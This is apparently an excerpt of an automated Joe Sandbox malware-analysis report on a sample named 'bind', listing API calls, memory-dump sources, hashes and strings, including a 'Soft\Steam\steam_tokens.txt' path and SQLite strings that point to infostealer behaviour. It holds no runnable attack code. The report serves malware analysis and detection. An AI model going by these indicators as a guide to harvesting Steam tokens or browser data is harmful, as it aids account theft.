• Instruction Fuzzy Hash: 94E048B4E0820D9BCB49DFA8E44569EBAB8AF08304F00856AE419E7350E77497458BA9
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
• lstrlenA.KERNEL32(00000000,00000000,?,00000000,0035E266), ref: 0035282F
  • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
  • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
  • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
Strings
• Soft\Steam\steam_tokens.txt, xrefs: 00352844
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$CreateObjectOpenSingleThreadWaitlstrcat
• String ID: Soft\Steam\steam_tokens.txt
• API String ID: 2202680014-3507145866
• Opcode ID: e8f3eba9e6150ee570dd85195f851541c32f98eeb23d73c24fd458b60bb7bb96
• Instruction ID: 528d9291f58f404539b14034b9ba7762718e2ad1da0060c13f3e35655bae1ebb
• Instruction Fuzzy Hash: 5401C871D00108AACB06FBB4DC97CEE7BB8AE11344F8046A5F5126E092EF20BB49C695
APIs
• LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: AllocLocal
• String ID: ERROR
• API String ID: 3494564517-2861137601
• Opcode ID: 5ab1d44ac03bb765918bdc194174d6406a0f2fc3063add2eb028f2ec321397ac
• Instruction ID: 38774e3a19eb33d040b60fa75e4a5bac3940cf617a05af1bfc0bcdbe6304653b
• Instruction Fuzzy Hash: A8F0E5376016146FE7234D59880056A77DA9BC5B6070E813AFE689F318C631EC4186E0
APIs
• VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,00000000,?,?,0034666C,?,00361ECC), ref: 003462C9
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00000000,?,?,0034666C,?,00361ECC), ref: 003462F5
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: e4e1d737b153b7c434c3504c46128a78423b96d0bcee1badbed95d2103a667da
• Instruction ID: 21a40538838f6912dfec154aa77aa8388abccbdb71b4a86cb4d35cfd5e199f75
• Instruction Fuzzy Hash: 3921A271700705ABCB25CFB4CC86BAAB7E5EF85314F24482DE65ACA290D2B5AD40CB04
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 022544c5bab4e80ebc368de094496e61a9d5a7671904987aeebc0969a1496ca6
• Instruction ID: 07b2ba47510eaf75a7002707a8f197228055a8add64b29abdf90bfe12792e0ed
• Instruction Fuzzy Hash: 3B414E7190021A9FCF16DF94D8929ADBBF1BF06314F1144BEE625AF651D730AE40CB52
APIs
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: realloc
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 471065373-0
                                                                                                                                                                                      • Opcode ID: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
                                                                                                                                                                                      • Instruction ID: 4040ac9b910eb7d7724dfc403353a0a40a3fe088e4c24dccbd46c39564703f2d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
                                                                                                                                                                                      • Instruction Fuzzy Hash: C3F0F97180530A9FDB109F55C58195DFBE8EF84268F14C86DE8984B310D374E544CF91
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: FolderPathlstrcpy
• String ID:
• API String ID: 1699248803-0
• Opcode ID: 49b371766f4d3178843f51514eae9ff7a43332bc46d07d4a8d7c49a071288536
• Instruction ID: 3cef17ed605714508578d67b2967a9100766a2706b1b3a420dbd1b1a48e69bc6
• Opcode Fuzzy Hash: 49b371766f4d3178843f51514eae9ff7a43332bc46d07d4a8d7c49a071288536
• Instruction Fuzzy Hash: 75E0C97591014CABDF11DBA4DC949AEB7FDAB48204F0085A1A909D7290E630EB469B50
APIs
• GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 9a24f30ef9416102be3b109d3539cd6f02a5409695c751d4359d8345c258106c
• Instruction ID: 11a7bf38af195e29a6e90864c7ecd63c71918de218a1528f771777fb35485c5e
• Opcode Fuzzy Hash: 9a24f30ef9416102be3b109d3539cd6f02a5409695c751d4359d8345c258106c
• Instruction Fuzzy Hash: DBD0C2315001245A862167B8EC414BE774CDD123B47560230FC0ADE091D620FA02C2C0
APIs
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
• Instruction ID: a929929d55870eb2e3dfc3d9b08de53e37bb6c9da6c43a06ed963554b33c57a4
• Opcode Fuzzy Hash: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
• Instruction Fuzzy Hash: A5F090B1554708CFDB006FA8E8C52153BA4F746219F5840BAE8150B201D735D5E1CB91
APIs
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: malloc
• String ID:
• API String ID: 2803490479-0
• Opcode ID: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
• Instruction ID: 08a60fc229ca929b4850671bf03eed3452f9cad2ea52f9bb94d0a5c68b8f0e05
• Opcode Fuzzy Hash: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
• Instruction Fuzzy Hash: 68F039B0C4830A9FCB009FA5DAC5A0DBBE8EB84258F14C46DE8988F710D334E580CB51
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: za$H$M$Q{a$ROWID$aggregate$ambiguous column name$excluded$false$main$new$no such column$non-deterministic functions$old$parameters$subqueries$the "." operator$true$window
                                                                                                                                                                                      • API String ID: 0-995943838
                                                                                                                                                                                      • Opcode ID: 33a4bf6f428ee4edd743105bfae109be89976f240395f77ce69a64c47f31ce08
                                                                                                                                                                                      • Instruction ID: 1d323ea87534b4984c39532d96b7a68bc5a2d3eb5612128e3b04e89f7f046be3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 33a4bf6f428ee4edd743105bfae109be89976f240395f77ce69a64c47f31ce08
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AF25A74A042658FEB20CF68D980B99BBF1BF49308F24C5DAD8999B391D770E985CF50
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                      • String ID: , ?$4$8a$@Da$__langid$_content$bua$bua$bua$compress$content$fts3$rowid$simple$uncompress$va$a
                                                                                                                                                                                      • API String ID: 1294909896-3798220086
                                                                                                                                                                                      • Opcode ID: 2119f446b8a753b6ee91c4f32a73f07abde53b9e9f4791bdb401906cb03614ce
                                                                                                                                                                                      • Instruction ID: ef7f48c3fdd7dc8ca6414c769173e2ec05d9438d07e734940b1c5d50411cadd4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2119f446b8a753b6ee91c4f32a73f07abde53b9e9f4791bdb401906cb03614ce
                                                                                                                                                                                      • Instruction Fuzzy Hash: 40C2B0B49083598FDB10CFA8C58479DBBF1AF88318F2589AED898AB341D774D985CF41
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: bua$bua$config$content$data$docsize$id INTEGER PRIMARY KEY, block BLOB$id INTEGER PRIMARY KEY, sz BLOB$idx$k PRIMARY KEY, v$rowid$segid, term, pgno, PRIMARY KEY(segid, term)$version
                                                                                                                                                                                      • API String ID: 0-2268357529
                                                                                                                                                                                      • Opcode ID: c027d0dd600d488911ade3015ef1b01bc4a252b854e2efd1cea36245f32c4c9b
                                                                                                                                                                                      • Instruction ID: f9c2f8dafde392a94833a84278d27f7abaf5337b7a20f26a6dc113648fca896e
                                                                                                                                                                                      • Opcode Fuzzy Hash: c027d0dd600d488911ade3015ef1b01bc4a252b854e2efd1cea36245f32c4c9b
                                                                                                                                                                                      • Instruction Fuzzy Hash: FE8206B49046499FDB10CFA9C18079DBBF1BF89318F25C92EE894AB395D774D881CB42
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: DELETE from$UPDATE$content$docsize$optimize
                                                                                                                                                                                      • API String ID: 1475443563-624765053
                                                                                                                                                                                      • Opcode ID: 771806b29ef72f59f754b5a686d1791b255bd140e1d9e921a47c54c426f6639a
                                                                                                                                                                                      • Instruction ID: 70c6a14bc8af06d6aef6aa9ad5cb9e7fc1cc1a093b7b28355e50790c232760be
                                                                                                                                                                                      • Opcode Fuzzy Hash: 771806b29ef72f59f754b5a686d1791b255bd140e1d9e921a47c54c426f6639a
                                                                                                                                                                                      • Instruction Fuzzy Hash: ABC2F674A042598FDB10DFA8C980B8DBBF1BF88308F2585A9D849AB345D774ED85CF81
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: UNIQUE$BINARY$bua$index$invalid rootpage$sqlite_master$sqlite_temp_master
                                                                                                                                                                                      • API String ID: 0-1733444394
                                                                                                                                                                                      • Opcode ID: 2f8d3c9bf28d88cb8a71b4b5b7ed41c19bc202f8b39fc1aea3eaff7862733210
                                                                                                                                                                                      • Instruction ID: c52f25025489653eb610d6e343a086c80a5a7374dd8721026aec1ef0af0b0df4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f8d3c9bf28d88cb8a71b4b5b7ed41c19bc202f8b39fc1aea3eaff7862733210
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1892F174E08255CFDB51CFA8C580B99BBF1BF89308F65C1A9E859AB352D734E881CB41
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: memcmp
• String ID: NEAR
• API String ID: 1475443563-1088024997
• Opcode ID: 8b567820edb5981adc55974c97c4ab7292800c8f9629d994c9b363bfa805e60a
• Instruction ID: b4e98ac7f2dea276e522b18a44adf406a464a3194d3be0cff96e2c83306ccf13
• Opcode Fuzzy Hash: 8b567820edb5981adc55974c97c4ab7292800c8f9629d994c9b363bfa805e60a
• Instruction Fuzzy Hash: 464234B4D08289CFDB80CFA8C18479DBBF1BB49308FA4C45AD8549B345D776E8A6CB51
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID:
• String ID: $ N$BINARY$J$`
• API String ID: 0-2078302688
• Opcode ID: 3207ff85514a45c9e6471492c497d6c89348ff8fb970d226ceca1aef56060c1a
• Instruction ID: 8b687d588507154f9b7ca5d7c21d8a58e11a900b957e56d8d79dd7eab4857ed6
• Opcode Fuzzy Hash: 3207ff85514a45c9e6471492c497d6c89348ff8fb970d226ceca1aef56060c1a
• Instruction Fuzzy Hash: 3C730474A452698FEB60CF18C880B99B7F1BF49314F6585DAD848AB391D770EE81CF90
APIs
Strings
Memory Dump Source
